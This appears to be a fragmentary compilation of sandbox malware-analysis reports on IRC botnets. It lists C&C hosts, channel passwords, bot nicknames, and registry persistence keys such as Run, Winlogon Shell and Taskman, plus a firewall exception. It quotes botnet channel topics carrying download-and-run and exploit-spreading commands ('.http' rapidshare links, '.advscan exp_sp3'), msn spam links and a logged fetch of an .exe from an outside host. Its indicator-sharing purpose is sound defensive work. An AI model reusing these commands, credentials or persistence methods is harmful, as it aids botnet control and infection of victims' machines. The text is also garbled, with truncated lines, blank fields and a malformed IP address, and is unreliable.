Remote Host     Port Number
192.168.88.2    80, 81

NICK xx[USA|XP]5722214
PONG :index.html
USER oo oo oo :bb
JOIN #.ooo

Registry Modifications
The following Registry Keys were created:
* HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_MACROVISIONS
* HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_MACROVISIONS\0000
* HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Macrovisions
* HKEY_CURRENT_USER\Software\Macrovisions

The newly created Registry Values are:
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_MACROVISIONS\0000]
Service = “Macrovisions”
Legacy = 0x00000001
ConfigFlags = 0x00000000
Class = “LegacyDriver”
ClassGUID = “{8ECC055D-047F-11D1-A537-0000F8753ED1}”
DeviceDesc = “Macrovisions”

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_MACROVISIONS]
NextInstance = 0x00000001

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Macrovisions]
DisplayName = “Macrovisions”
ImagePath = “\??\%Temp%\71863.sys”
Type = 0x00000001
Start = 0x00000003

Memory Modifications
There was a

iik.for5love.ru (big ruski botnet)

Host Name          IP Address
dell-d3e62f7e26
hot.jatajoo.ru

URLs
* http:// (iik.for5love.ru)
* http:// (iik.for5love.ru)
* http:// (iik.for5love.ru)

* C&C Server:
* Server Password:
* Username: SP3-152
* Nickname: [N00_DEU_XP_1314922]_CHAR(0x08)_ä@
* Channel: (Password: )
* Channeltopic:

* C&C Server:
* Server Password:
* Username: SP3-686
* Nickname: [00_DEU_XP_1861146]
* Channel: #nit (Password: open)
* Channeltopic: :.asc -S|.http http://rapidshare.com/files/314264722/re|.advscan

trbotnet.sytes.net (irc botnet)

Host Name          IP Address
dell-d3e62f7e26
trbotnet.sytes.net

* C&C Server:
* Server Password:
* Username: rciahpk
* Nickname: [DEU|XP|772697]
* Channel: #son (Password: botnetim)
* Channeltopic: :.msn seen foto? hxxp://www.travestiniz.co.cc/images.php?id= |.msn.email hxxp://www.travestiniz.co.cc/images.php?id= |.p2p |.yims
Topic By: [ Load ]

botnet) : 154491.207.6.166:3838 chanel=##F##
Now talking in ##F##
Topic On: [##F## ] [ .asc -S|.http http://rapidshare.com/files/313278869/hus|.advscan exp_sp3 35 3 0 -b -e -r|.advscan exp_sp2 35 3 0 -b -e -r|.advscan exp_sp3 15 3 0 -a -e -r|.advscan exp_sp2 15 3 0 -a -e -r|.r.getfile C:\start.exe 1 ]
Topic By: [ ok ]
Modes On: [ ##F## ]

gt10.smo7he.com (mIRC bots hosted in China, Beijing, Chinanet Jiangsu Province Network)

Host Name          IP Address
gt10.smo7he.com

Opened listening TCP connection on port: 18631
Opened listening TCP connection on port: 113

* C&C Server:
* Server Password:
* Username: laMer
* Nickname: XPMdv4E
* Channel: #kwt-team (Password: #191#)
* Channeltopic:

hosting infos: http://whois.domaintools.com/


Host Name          IP Address
ana.smo7he.net
alkeichah.com

UDP Connections
Remote IP Address:    Port: 1975
Send Datagram: packet(s) of size 7
Send Datagram: 2 packet(s) of size 3
Send Datagram: packet(s) of size 49
Send Datagram: packet(s) of size 58
Send Datagram: packet(s) of size 1
Recv Datagram: 6329 packet(s) of size 0
Recv Datagram: packet(s) of size 8
Recv Datagram: 2 packet(s)


Remote Host     Port Number
66.252.5.47     7000
72.35.84.6      80

* The data identified by the following URL was then requested from the remote web server:
  o http://alkeichah.com/881.exe

NICK jcljatvx
JOIN #usb trb50
QUIT gettin new bin.
NICK dpzgprmi
USER dpzgprmi * 0 :COMPUTERNAME
MODE dpzgprmi +ix
USER jcljatvx * 0 :COMPUTERNAME
MODE jcljatvx +ix

Other details
* The following port was open in the system:


Remote Host       Port Number
72.184.196.76     6667

NICK XP|00|USA|SP2|4653
USER jddgw 0 0 :XP|00|USA|SP2|4653
USERHOST XP|00|USA|SP2|4653
MODE XP|00|USA|SP2|4653 +x+iB
JOIN #ecko
PRIVMSG #ecko :12Password accepted
12Type commandlist
12[PSTORE]: Starting Pstore.
12[PSTORE]: Pstore Started.
PONG :1F6819DC

Other details
* The following ports were open in the system:

Port   Protocol   Process
113    TCP        msconfig.exe (%System%\msconfig.exe)
1052   TCP        msconfig.exe (%System%\msconfig.exe)

Registry Modifications
* The following Registry Keys were created:
  o [pathname


Host Name          IP Address
dell-d3e62f7e26

* C&C Server:
* Server Password:
* Username: XP-5750
* Nickname: [DEU|00|P|03462]
* Channel: #nuevos# (Password: mariano)
* Channeltopic: :

Registry Changes by all processes
Create or Open Changes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run “winlogin” = winlogin.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run “winlogin” = winlogin.exe
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List “c:\1.exe” = c:\1.exe:*:Enabled:winlogin
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg “LogSessionName” = [REG_EXPAND_SZ, value: stdout]
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg “Active”


bnetnew.helohmar.com

connection to remote server: bnetnew.helohmar.com TCP port 8800

SMTP:
* Username / Password: /
SMTP:
* Username / Password: /

Registry Changes by all processes
Create or Open Changes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon “Taskman” = C:\RECYCLER\S-1-5-21-0243556031-888888379-781863308-1455\mmdg.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon “Shell” = explorer.exe,C:\RECYCLER\S-1-5-21-0243556031-888888379-781863308-1455\mmdg.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run “Tjmm71” = C:\RECYCLER\S-1-5-21-0243556031-888888379-781863308-1455\mmdg.exe
Reads
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon